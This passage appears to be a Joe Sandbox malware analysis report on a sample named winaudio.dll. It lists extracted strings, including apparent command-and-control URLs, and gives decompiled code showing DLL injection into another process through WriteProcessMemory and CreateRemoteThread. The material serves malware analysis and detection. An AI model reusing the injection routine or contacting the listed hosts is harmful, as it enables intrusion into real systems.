                        0x002d2f3d
                        0x002d2f41
                        0x002d2f48
                        0x002d2f4f
                        0x002d2f56
                        0x002d2f5d
                        0x002d2f64
                        0x002d2f66
                        0x002d2f6d
                        0x002d2f74
                        0x002d2f7b
                        0x002d2f82
                        0x002d2f82
                        0x002d2f89
                        0x002d2f8a
                        0x002d2f8f
                        0x002d2f96
                        0x002d2fa0
                        0x002d2fa0
                        0x002d2fa7
                        0x002d2fa8
                        0x002d2fad
                        0x002d2fb4
                        0x002d2fbb
                        0x002d2fc0
                        0x002d2fc4
                        0x002d2fd0
                        0x002d2fd0
                        0x002d2fd7
                        0x002d2fd8
                        0x002d2fdd
                        0x002d2fe4
                        0x002d2feb
                        0x002d2ff0
                        0x002d2ff3
                        0x002d2ff7
                        0x002d3000
                        0x002d3000
                        0x002d3007
                        0x002d3008
                        0x002d300d
                        0x002d3014
                        0x002d301b
                        0x002d3020
                        0x002d3023
                        0x002d3027
                        0x002d3030
                        0x002d3030
                        0x002d3037
                        0x002d3038
                        0x002d303d
                        0x002d3044
                        0x002d3046
                        0x002d3050
                        0x002d3050
                        0x002d3057
                        0x002d3058
                        0x002d305d
                        0x002d3064
                        0x002d3066
                        0x002d3070
                        0x002d3070
                        0x002d3077
                        0x002d3078
                        0x002d307d
                        0x002d3084
                        0x002d3086
                        0x002d3090
                        0x002d3090
                        0x002d3097
                        0x002d3098
                        0x002d309d
                        0x002d30a4
                        0x002d30a6
                        0x002d30b0
                        0x002d30b0
                        0x002d30b7
                        0x002d30b8
                        0x002d30bd
                        0x002d30c4
                        0x002d30c6
                        0x002d30d0
                        0x002d30d0
                        0x002d30d7
                        0x002d30d8
                        0x002d30dd
                        0x002d30e4
                        0x002d30eb
                        0x002d30f0
                        0x002d30f3
                        0x002d30f7
                        0x002d3100
                        0x002d3100
                        0x002d3107
                        0x002d3108
                        0x002d310d
                        0x002d3114
                        0x002d3116
                        0x002d3120
                        0x002d3120
                        0x002d3127
                        0x002d3128
                        0x002d312d
                        0x002d3134
                        0x002d3136
                        0x002d3140
                        0x002d3140
                        0x002d3147
                        0x002d3148
                        0x002d314d
                        0x002d3154
                        0x002d315b
                        0x002d315d
                        0x002d3160
                        0x002d3167
                        0x002d316b
                        0x002d3172
                        0x002d3172
                        0x002d3179
                        0x002d317a
                        0x002d317f
                        0x002d3186
                        0x002d3190
                        0x002d3190
                        0x002d3197
                        0x002d3198
                        0x002d319d
                        0x002d31a4
                        0x002d31a6
                        0x002d31b0
                        0x002d31b0
                        0x002d31b7
                        0x002d31b8
                        0x002d31bd
                        0x002d31c4
                        0x002d31cb
                        0x002d31d0
                        0x002d31d3
                        0x002d31d7
                        0x002d31e0
                        0x002d31e0
                        0x002d31e7
                        0x002d31e8
                        0x002d31ed
                        0x002d31f4
                        0x002d31f6
                        0x002d3200
                        0x002d3200
                        0x002d3207
                        0x002d3208
                        0x002d320d
                        0x002d3214
                        0x002d3216
                        0x002d3220
                        0x002d3220
                        0x002d3227
                        0x002d3228
                        0x002d322d
                        0x002d3234
                        0x002d323b
                        0x002d3240
                        0x002d3243
                        0x002d3247
                        0x002d324e
                        0x002d3255
                        0x002d3258
                        0x002d325c
                        0x002d3263
                        0x002d3263
                        0x002d326a
                        0x002d326b
                        0x002d3270
                        0x002d3277
                        0x002d327e
                        0x002d3283
                        0x002d3286
                        0x002d328a
                        0x002d3291
                        0x002d3291
                        0x002d3298
                        0x002d3299
                        0x002d329e
                        0x002d32a5
                        0x002d32ac
                        0x002d32b1
                        0x002d32b4
                        0x002d32bb
                        0x002d32bf
                        0x002d32c6
                        0x002d32cd
                        0x002d32d0
                        0x002d32d4
                        0x002d32db
                        0x002d32e2
                        0x002d32e5
                        0x002d32e9
                        0x002d32f0
                        0x002d32f0
                        0x002d32f7
                        0x002d32f8
                        0x002d32fd
                        0x002d3304
                        0x002d330b
                        0x002d3310
                        0x002d3313
                        0x002d3317
                        0x002d3320
                        0x002d3320
                        0x002d3327
                        0x002d3328
                        0x002d332d
                        0x002d3334
                        0x002d333b
                        0x002d3340
                        0x002d3347
                        0x002d334a
                        0x002d3351
                        0x002d3355
                        0x002d335c
                        0x002d3363
                        0x002d336a
                        0x002d3371
                        0x002d3378
                        0x002d337f
                        0x002d3386
                        0x002d338d
                        0x002d3394
                        0x002d339b
                        0x002d33a2
                        0x002d33a9
                        0x002d33b0
                        0x002d33b7
                        0x002d33be
                        0x002d33c5
                        0x002d33cc
                        0x002d33d3
                        0x002d33da
                        0x002d33e1
                        0x002d33e8
                        0x002d33ef
                        0x002d33f6
                        0x002d3400
                        0x002d3400
                        0x002d3407
                        0x002d3408
                        0x002d340d
                        0x002d3414
                        0x002d341b
                        0x002d3420
                        0x002d3423
                        0x002d342a
                        0x002d342e
                        0x002d3435
                        0x002d343c
                        0x002d3443
                        0x002d3446
                        0x002d344a
                        0x002d3451
                        0x002d3458
                        0x002d345b
                        0x002d345f
                        0x002d3466
                        0x002d346d
                        0x002d3470
                        0x002d3474
                        0x002d3480
                        0x002d3480
                        0x002d3487
                        0x002d3488
                        0x002d348d
                        0x002d3494
                        0x002d349b
                        0x002d34a0
                        0x002d34a3
                        0x002d34a7
                        0x002d34ae
                        0x002d34b5
                        0x002d34b9
                        0x002d34c0
                        0x002d34c0
                        0x002d34c7
                        0x002d34c8
                        0x002d34cd
                        0x002d34d4
                        0x00000000
                        0x002d34d4
                        0x002d34db

                        Strings
                        • SeDebugPrivilege, xrefs: 002D2D1F
                        • \VarFileInfo\Translation, xrefs: 002D2CE4
                        • http://8awang.com:10100/plusxyzs, xrefs: 002D3451
                        • 5B7C84755D8041139A7AEBA6F4E5912F.dat, xrefs: 002D2B26
                        • http://gmt.yunliao8.com:10100/plusxyzs, xrefs: 002D34AE
                        • \StringFileInfo\, xrefs: 002D2D38
                        • WriteProcessMemory, xrefs: 002D2FC4
                        • c:\windows\temp\winaudio.dll, xrefs: 002D2BB4
                        • %02X-%02X-%02X-%02X-%02X-%02X, xrefs: 002D328A
                        • SOFTWARE\GMPROT\, xrefs: 002D2F6D
                        • from client request, xrefs: 002D2C4D
                        • DNS.%d:*.%s,DNS.%d:%s,, xrefs: 002D2E47
                        • {abababab-baba-abab-baba-ecf4bb862ded}, xrefs: 002D324E
                        • si-2n*8o_5brl-kq, xrefs: 002D343C
                        • Software\Licenses, xrefs: 002D32E9
                        • /apiplay/H_S_Timing/report, xrefs: 002D2B84
                        • OriginalFilename, xrefs: 002D2D4A
                        • CertFreeCertificateContext, xrefs: 002D28B4
                        • http://41ku.cn:10100/plusxyzs, xrefs: 002D3474
                        • CreateToolhelp32Snapshot, xrefs: 002D290F
                        • C:\Windows\Temp\%s, xrefs: 002D2E74
                        • CertCreateCertificateContext, xrefs: 002D2884
                        • from server response, xrefs: 002D2C78
                        • WaitForSingleObject, xrefs: 002D3027
                        • /apiplay/Cept_Sp/report, xrefs: 002D33F6
                        • CertAddCertificateContextToStore, xrefs: 002D28EB
                        • {Z3CD-FA87-B5E6-0SYI}, xrefs: 002D3317
                        • CreateRemoteThread, xrefs: 002D2FF7
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID:
                        • String ID: %02X-%02X-%02X-%02X-%02X-%02X$/apiplay/Cept_Sp/report$/apiplay/H_S_Timing/report$5B7C84755D8041139A7AEBA6F4E5912F.dat$C:\Windows\Temp\%s$CertAddCertificateContextToStore$CertCreateCertificateContext$CertFreeCertificateContext$CreateRemoteThread$CreateToolhelp32Snapshot$DNS.%d:*.%s,DNS.%d:%s,$OriginalFilename$SOFTWARE\GMPROT\$SeDebugPrivilege$Software\Licenses$WaitForSingleObject$WriteProcessMemory$\StringFileInfo\$\VarFileInfo\Translation$c:\windows\temp\winaudio.dll$from client request$from server response$http://41ku.cn:10100/plusxyzs$http://8awang.com:10100/plusxyzs$http://gmt.yunliao8.com:10100/plusxyzs$si-2n*8o_5brl-kq${Z3CD-FA87-B5E6-0SYI}${abababab-baba-abab-baba-ecf4bb862ded}
                        • API String ID: 0-3930588258
                        • Opcode ID: c0f1ca16072f801638ff3b9099c9358270e845a2a77580ccee2d6d88728d636a
                        • Instruction ID: 7e729b116ca47ab3e2c328ae6b74d2d5bc727d07dcc195c9a97154a6ad7f8a8d
                        • Opcode Fuzzy Hash: c0f1ca16072f801638ff3b9099c9358270e845a2a77580ccee2d6d88728d636a
                        • Instruction Fuzzy Hash: 4162180051D6C486E3638739E99D763AFD8AB6B318F19A789D4C45E1F3EFA81198C303
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002D5C20 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 133COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E002D5C20(long __ecx) {
				long _v8;
				void* _v12;
				intOrPtr _t10;
				intOrPtr _t13;
				signed int _t17;
				signed int _t19;
				signed int _t23;
				signed int _t25;
				signed int _t36;
				void* _t41;
				intOrPtr* _t45;
				void* _t48;
				void* _t49;
				long _t52;
				void* _t53;
				long _t55;
				void* _t56;

				_t55 = __ecx;
				_v8 = 0;
				if(E00383166("c:\\windows\\temp\\winaudio.dll", 0) != 0xffffffff) {
					_t56 = OpenProcess(0x42a, 0, _t55);
					if(_t56 != 0) {
						_t10 =  *0x3ebb50; // 0x6556
						_t12 =  >  ? 0 : _t10 + 2;
						_t45 = "c:\\windows\\temp\\winaudio.dll";
						 *0x3ebb50 =  >  ? 0 : _t10 + 2;
						_t49 = _t45 + 1;
						do {
							_t13 =  *_t45;
							_t45 = _t45 + 1;
						} while (_t13 != 0);
						 *0x3f0830 = 0x7ff7;
						_t52 = _t45 - _t49 + 1;
						_t41 = VirtualAllocEx(_t56, 0, _t52, 0x1000, 4);
						if(_t41 != 0) {
							if(WriteProcessMemory(_t56, _t41, "c:\\windows\\temp\\winaudio.dll", _t52,  &_v8) != 0) {
								_t17 =  *0x3ebb44; // 0x6556
								_t19 =  >  ? 0 : _t17 + 2;
								 *0x3ebb44 = _t19;
								 *0x3f0830 = _t19 & 0x00000019 | 0x000000e0;
								_t48 = CreateRemoteThread(_t56, 0, 0,  *0x3f085c, _t41, 0, 0);
								_v12 = _t48;
								if(_t48 != 0) {
									_t23 =  *0x3ebb68; // 0x6556
									_t25 =  >  ? 0 : _t23 + 2;
									 *0x3ebb68 = _t25;
									 *0x3f0830 = _t25 & 0x00000019 | 0x000000e0;
									WaitForSingleObject(_t48, 0xffffffff);
									_t53 = 1;
									 *0x3f0830 = 0x7ff7;
									CloseHandle(_v12);
								} else {
									GetLastError();
									_t53 = 0xfffffffa;
									 *0x3f0830 = 0x7ff7;
								}
							} else {
								GetLastError();
								_t53 = 0xfffffffb;
								 *0x3f0830 = 0x7ff7;
							}
							VirtualFreeEx(_t56, _t41, 0, 0x10000);
						} else {
							GetLastError();
							_t53 = _t41 - 4;
							 *0x3f0830 = 0x7ff7;
						}
						CloseHandle(_t56);
						 *0x3f0830 = 0x7ff7;
						return _t53;
					} else {
						_t36 = GetLastError();
						 *0x3f0830 = 0x7ff7;
						return _t36 | 0xffffffff;
					}
				} else {
					GetLastError();
					 *0x3f0830 = 0x7ff7;
					return 0xfffffff6;
				}
			}




















                        0x002d5c2e
                        0x002d5c30
                        0x002d5c42
                        0x002d5c6c
                        0x002d5c70
                        0x002d5c8a
                        0x002d5c99
                        0x002d5c9c
                        0x002d5ca1
                        0x002d5ca6
                        0x002d5cb0
                        0x002d5cb0
                        0x002d5cb2
                        0x002d5cb3
                        0x002d5cbb
                        0x002d5ccc
                        0x002d5cd9
                        0x002d5cdd
                        0x002d5d0b
                        0x002d5d27
                        0x002d5d40
                        0x002d5d43
                        0x002d5d52
                        0x002d5d5d
                        0x002d5d5f
                        0x002d5d64
                        0x002d5d7d
                        0x002d5d8e
                        0x002d5d91
                        0x002d5d9f
                        0x002d5da4
                        0x002d5dad
                        0x002d5db2
                        0x002d5dbc
                        0x002d5d66
                        0x002d5d66
                        0x002d5d6c
                        0x002d5d71
                        0x002d5d71
                        0x002d5d0d
                        0x002d5d0d
                        0x002d5d13
                        0x002d5d18
                        0x002d5d18
                        0x002d5dcb
                        0x002d5cdf
                        0x002d5cdf
                        0x002d5ce5
                        0x002d5ce8
                        0x002d5ce8
                        0x002d5dd2
                        0x002d5dda
                        0x002d5dea
                        0x002d5c72
                        0x002d5c72
                        0x002d5c7b
                        0x002d5c89
                        0x002d5c89
                        0x002d5c44
                        0x002d5c44
                        0x002d5c4f
                        0x002d5c5d
                        0x002d5c5d

                        APIs
                        • GetLastError.KERNEL32 ref: 002D5C44
                        • OpenProcess.KERNEL32(0000042A,00000000), ref: 002D5C66
                        • GetLastError.KERNEL32 ref: 002D5C72
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: ErrorLast$OpenProcess
                        • String ID: c:\windows\temp\winaudio.dll
                        • API String ID: 2713816117-3304725038
                        • Opcode ID: 5016b88beea87622833f6f9c2f47504e00ea75b026dbfc0481624db161a1ce92
                        • Instruction ID: b70e9d89e8a9f297f4e73925da7a280931f134cb5256b9242299a31958e34479
                        • Opcode Fuzzy Hash: 5016b88beea87622833f6f9c2f47504e00ea75b026dbfc0481624db161a1ce92
                        • Instruction Fuzzy Hash: 984128716106129BD726AF6CEC59B7A7BECEB44364F10033AF819D73E0DBB45800CAA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0037BD80 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 109libraryloaderCOMMON
                        Download Yara Rule
                        C-Code - Quality: 47%
                        			E0037BD80(void* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				char _v9;
				short _v11;
				char _v28;
				char _v29;
				short _v31;
				char _v48;
				char _v49;
				short _v51;
				char _v68;
				char _v84;
				char _v172;
				intOrPtr _v176;
				void* __esi;
				signed int _t28;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr _t37;
				intOrPtr _t59;
				intOrPtr* _t63;
				intOrPtr _t65;
				struct HINSTANCE__* _t67;
				void* _t69;
				void* _t71;
				signed int _t72;

				_t28 =  *0x3e1008; // 0x847b54ee
				_v8 = _t28 ^ _t72;
				asm("xorps xmm0, xmm0");
				_t59 = _a12;
				_v176 = _a4;
				_t31 =  *0x3e608c; // 0x7
				_v28 = 0;
				asm("movups [ebp-0x17], xmm0");
				_v11 = 0;
				_v9 = 0;
				_v48 = 0;
				asm("movups [ebp-0x2b], xmm0");
				_v31 = 0;
				_v29 = 0;
				_v68 = 0;
				asm("movups [ebp-0x3f], xmm0");
				_v51 = 0;
				_v49 = 0;
				E0037A830( &_v28, _t31, "MD5Init", _t31);
				_t34 =  *0x3e60a4; // 0x9
				E0037A830( &_v48, _t34, "MD5Update", _t34);
				_t37 =  *0x3e60b8; // 0x8
				E0037A830( &_v68, _t37, "MD5Final", _t37);
				 *0x3ee038 = 0;
				_t67 = LoadLibraryW(L"Advapi32.dll");
				if(_t67 != 0) {
					 *0x3ee02c = GetProcAddress(_t67,  &_v28);
					 *0x3ee030 = GetProcAddress(_t67,  &_v48);
					 *0x3ee034 = GetProcAddress(_t67,  &_v68);
					 *0x3ee02c( &_v172, _t69);
					 *0x3ee030( &_v172, _v176, _a8);
					 *0x3ee034( &_v172);
					_push(0x10);
					_t63 = E0037C180( &_v84);
					_t26 = _t63 + 1; // 0x1
					_t71 = _t26;
					do {
						_t65 =  *_t63;
						_t63 = _t63 + 1;
					} while (_t65 != 0);
					E0037E340(_t59, _t55, _t63 - _t71);
					FreeLibrary(_t67);
					_pop(_t69);
				}
				return E002E056D(_v8 ^ _t72, _t65, _t69);
			}




























                        0x0037bd89
                        0x0037bd90
                        0x0037bd96
                        0x0037bd9a
                        0x0037bd9e
                        0x0037bda4
                        0x0037bdb3
                        0x0037bdb8
                        0x0037bdbc
                        0x0037bdc2
                        0x0037bdc6
                        0x0037bdca
                        0x0037bdce
                        0x0037bdd4
                        0x0037bdd8
                        0x0037bddc
                        0x0037bde0
                        0x0037bde6
                        0x0037bdea
                        0x0037bdef
                        0x0037bdff
                        0x0037be04
                        0x0037be14
                        0x0037be1c
                        0x0037be31
                        0x0037be35
                        0x0037be49
                        0x0037be55
                        0x0037be61
                        0x0037be6d
                        0x0037be83
                        0x0037be90
                        0x0037be99
                        0x0037bea1
                        0x0037bea6
                        0x0037bea6
                        0x0037beb0
                        0x0037beb0
                        0x0037beb2
                        0x0037beb3
                        0x0037bebc
                        0x0037bec5
                        0x0037becb
                        0x0037becb
                        0x0037bedb

                        APIs
                        • LoadLibraryW.KERNEL32(Advapi32.dll,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0037BE2B
                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0037BE47
                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0037BE53
                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0037BE5F
                        • MD5Init.NTDLL(?), ref: 0037BE6D
                        • MD5Update.NTDLL(?,?,?), ref: 0037BE83
                        • MD5Final.NTDLL(?), ref: 0037BE90
                        • FreeLibrary.KERNEL32(00000000), ref: 0037BEC5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: AddressProc$Library$FinalFreeInitLoadUpdate
                        • String ID: Advapi32.dll$MD5Final$MD5Init$MD5Update
                        • API String ID: 4212981826-256019228
                        • Opcode ID: acf6ad33c9642ffd68715de9b1dd5866545fede10ab1e80905deda1a533cca14
                        • Instruction ID: 75f7236adf0e0fd7f6611b19f3794c19bbdc260a19f2b738d5cd8dd3c13a2985
                        • Opcode Fuzzy Hash: acf6ad33c9642ffd68715de9b1dd5866545fede10ab1e80905deda1a533cca14
                        • Instruction Fuzzy Hash: 0741C371D00258EFDB12DBA4DC85BEFBBBCBF09314F00415AF508AB251D7B569498BA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002D6370 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 177COMMON
                        Download Yara Rule
                        C-Code - Quality: 78%
                        			E002D6370(void* __ebx, long __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				signed int _v8;
				char _v272;
				char _v274;
				char _v276;
				CHAR* _v280;
				intOrPtr _v284;
				signed int _t20;
				signed int _t27;
				signed int _t29;
				CHAR* _t33;
				char _t36;
				char _t37;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t46;
				CHAR* _t48;
				signed int _t52;
				void* _t53;
				signed int _t54;
				signed int _t56;
				CHAR* _t57;
				long _t58;
				signed int _t59;
				void* _t60;
				signed int _t61;
				CHAR* _t68;
				CHAR* _t72;
				char* _t77;
				void* _t81;
				CHAR* _t84;
				intOrPtr _t85;
				CHAR* _t86;
				void* _t87;
				long _t89;
				signed int _t90;
				void* _t91;
				void* _t92;
				void* _t93;
				void* _t94;
				void* _t96;

				_t81 = __edi;
				_t80 = __edx;
				_t20 =  *0x3e1008; // 0x847b54ee
				_v8 = _t20 ^ _t90;
				_v284 = __edx;
				_t89 = __ecx;
				E0037E1A0(__edi,  &_v272, 0, 0x105);
				_t92 = _t91 + 0xc;
				_push(0x105);
				_push( &_v272);
				_push(_t89);
				if( *0x39e1e8() != 0) {
					_t27 =  *0x3ebb14; // 0x6556
					_t29 =  >  ? 0 : _t27 + 2;
					 *0x3ebb14 = _t29;
					 *0x3f0830 = _t29 & 0x00000019 | 0x000000e0;
					_t89 = GetLogicalDriveStringsA(0, 0);
					_t99 = _t89;
					if(_t89 != 0) {
						_push(_t81);
						_t5 = _t89 + 1; // 0x1
						_t82 = _t5;
						_push(_t5);
						_t33 = E002E0A70(_t80, _t89, _t99);
						_t93 = _t92 + 4;
						_v280 = _t33;
						if(_t33 != 0) {
							E0037E1A0(_t82, _t33, 0, _t82);
							_t84 = _v280;
							_t94 = _t93 + 0xc;
							if(GetLogicalDriveStringsA(_t89, _t84) != 0) {
								_t36 =  *((intOrPtr*)(" :")); // 0x3a20
								_v276 = _t36;
								_t37 =  *0x3dce3a; // 0x0
								_push(0x104);
								 *0x3f0830 = 0x7ff7;
								_v274 = _t37;
								_t72 = E002E0A70(_t80, _t89, __eflags);
								_t94 = _t94 + 4;
								_t89 = _t84;
								__eflags = _t72;
								if(_t72 == 0) {
									goto L4;
								} else {
									E0037E1A0(_t84, _t72, 0, 0x104);
									_t96 = _t94 + 0xc;
									while(1) {
										_t85 =  *0x39e084;
										_v276 =  *_t89;
										_t43 = QueryDosDeviceA( &_v276, _t72, 0x104);
										__eflags = _t43;
										if(_t43 != 0) {
											goto L11;
										}
										_t58 = GetLastError();
										__eflags = _t58 - 0x7a;
										if(_t58 == 0x7a) {
											_t59 =  *0x3ebb80; // 0x6556
											_t60 = _t59 + 2;
											__eflags = _t60 - 0x1490;
											_t61 =  >  ? 0 : _t60;
											 *0x3ebb80 = _t61;
											 *0x3f0830 = _t61 & 0x00000019 | 0x000000e0;
											L002E086C(_t72);
											_push(0x104);
											_t72 = E002E0A70(_t80, _t89, __eflags);
											_t96 = _t96 + 8;
											__eflags = _t72;
											if(_t72 != 0) {
												E0037E1A0(_t85, _t72, 0, 0x104);
												_t96 = _t96 + 0xc;
												_t68 = QueryDosDeviceA( &_v276, _t72, 0x104);
												__eflags = _t68;
												if(_t68 != 0) {
													goto L11;
												}
											}
										}
										L19:
										L002E086C(_v280);
										_t94 = _t96 + 4;
										__eflags = _t72;
										if(_t72 != 0) {
											_push(_t72);
											goto L21;
										}
										goto L22;
										L11:
										_t86 = _t72;
										_t13 =  &(_t86[1]); // 0x1
										_t77 = _t13;
										do {
											_t44 =  *_t86;
											_t86 =  &(_t86[1]);
											__eflags = _t44;
										} while (_t44 != 0);
										_t87 = _t86 - _t77;
										_t46 = E003832E4( &_v272, _t72, _t87);
										_t96 = _t96 + 0xc;
										__eflags = _t46;
										if(_t46 == 0) {
											_t48 =  &_v272 + _t87;
											__eflags = _t48;
											_push(_t48);
											E002D5BF0(_t77, _v284, 0x104, "%s%s",  &_v276);
											_t96 = _t96 + 0x14;
										} else {
											_t52 =  *0x3ebb78; // 0x6556
											_t53 = _t52 + 2;
											__eflags = _t53 - 0x1490;
											_t54 =  >  ? 0 : _t53;
											 *0x3ebb78 = _t54;
											_t56 = _t54 & 0x00000019 | 0x000000e0;
											__eflags = _t56;
											 *0x3f0830 = _t56;
											do {
												_t57 =  *_t89;
												_t89 = _t89 + 1;
												__eflags = _t57;
											} while (_t57 != 0);
											__eflags =  *_t89;
											if( *_t89 != 0) {
												continue;
											}
										}
										goto L19;
									}
								}
							} else {
								L4:
								_push(_t84);
								L21:
								L002E086C();
							}
						}
						L22:
					}
				}
				return E002E056D(_v8 ^ _t90, _t80, _t89);
			}











































                        0x002d6370
                        0x002d6370
                        0x002d6379
                        0x002d6380
                        0x002d638f
                        0x002d6398
                        0x002d639a
                        0x002d639f
                        0x002d63a8
                        0x002d63ad
                        0x002d63ae
                        0x002d63b7
                        0x002d63bd
                        0x002d63d3
                        0x002d63d6
                        0x002d63e5
                        0x002d63ec
                        0x002d63ee
                        0x002d63f0
                        0x002d63f6
                        0x002d63f7
                        0x002d63f7
                        0x002d63fa
                        0x002d63fb
                        0x002d6400
                        0x002d6403
                        0x002d640b
                        0x002d6415
                        0x002d641a
                        0x002d6420
                        0x002d6429
                        0x002d6431
                        0x002d6437
                        0x002d643e
                        0x002d6443
                        0x002d6448
                        0x002d6452
                        0x002d645d
                        0x002d645f
                        0x002d6462
                        0x002d6464
                        0x002d6466
                        0x00000000
                        0x002d6468
                        0x002d6470
                        0x002d6475
                        0x002d6478
                        0x002d647a
                        0x002d6485
                        0x002d6493
                        0x002d6495
                        0x002d6497
                        0x00000000
                        0x00000000
                        0x002d6499
                        0x002d649f
                        0x002d64a2
                        0x002d64a8
                        0x002d64af
                        0x002d64b2
                        0x002d64b8
                        0x002d64bb
                        0x002d64c8
                        0x002d64cd
                        0x002d64d2
                        0x002d64dc
                        0x002d64de
                        0x002d64e1
                        0x002d64e3
                        0x002d64f1
                        0x002d64f6
                        0x002d6506
                        0x002d6508
                        0x002d650a
                        0x00000000
                        0x00000000
                        0x002d650a
                        0x002d64e3
                        0x002d658f
                        0x002d6595
                        0x002d659a
                        0x002d659d
                        0x002d659f
                        0x002d65a1
                        0x00000000
                        0x002d65a1
                        0x00000000
                        0x002d6510
                        0x002d6510
                        0x002d6512
                        0x002d6512
                        0x002d6515
                        0x002d6515
                        0x002d6517
                        0x002d6518
                        0x002d6518
                        0x002d651c
                        0x002d6527
                        0x002d652c
                        0x002d652f
                        0x002d6531
                        0x002d656d
                        0x002d656d
                        0x002d656f
                        0x002d6587
                        0x002d658c
                        0x002d6533
                        0x002d6533
                        0x002d653a
                        0x002d653d
                        0x002d6542
                        0x002d6545
                        0x002d654d
                        0x002d654d
                        0x002d6552
                        0x002d6557
                        0x002d6557
                        0x002d6559
                        0x002d655a
                        0x002d655a
                        0x002d655e
                        0x002d6560
                        0x00000000
                        0x002d6562
                        0x002d6560
                        0x00000000
                        0x002d6531
                        0x002d6478
                        0x002d642b
                        0x002d642b
                        0x002d642b
                        0x002d65a2
                        0x002d65a2
                        0x002d65a7
                        0x002d6429
                        0x002d65aa
                        0x002d65aa
                        0x002d65ab
                        0x002d65ba

                        APIs
                        • GetProcessImageFileNameA.PSAPI(?,?,00000105,?,?,?), ref: 002D63AF
                        • GetLogicalDriveStringsA.KERNEL32(00000000,00000000), ref: 002D63EA
                        • GetLogicalDriveStringsA.KERNEL32(00000000,?), ref: 002D6425
                        • QueryDosDeviceA.KERNEL32(?,00000000,00000104), ref: 002D6493
                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000105,?,?,?), ref: 002D6499
                        • QueryDosDeviceA.KERNEL32(?,00000000,00000104), ref: 002D6506
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: DeviceDriveLogicalQueryStrings$ErrorFileImageLastNameProcess
                        • String ID: %s%s
                        • API String ID: 3435445719-3252725368
                        • Opcode ID: 3b57b0c88b39b6a60c5bfd6e29cb2b601f179d84c9b3a0311620219560593b43
                        • Instruction ID: af254883cb59f9771111c8039dfc4104fc5fa0d99c29c56a2895c4fae2a31a53
                        • Opcode Fuzzy Hash: 3b57b0c88b39b6a60c5bfd6e29cb2b601f179d84c9b3a0311620219560593b43
                        • Instruction Fuzzy Hash: C55138B1D102465BEB22DF64EC83BEB77AC9B04304F4805B6E549D7381D6B5DDD4CAA0
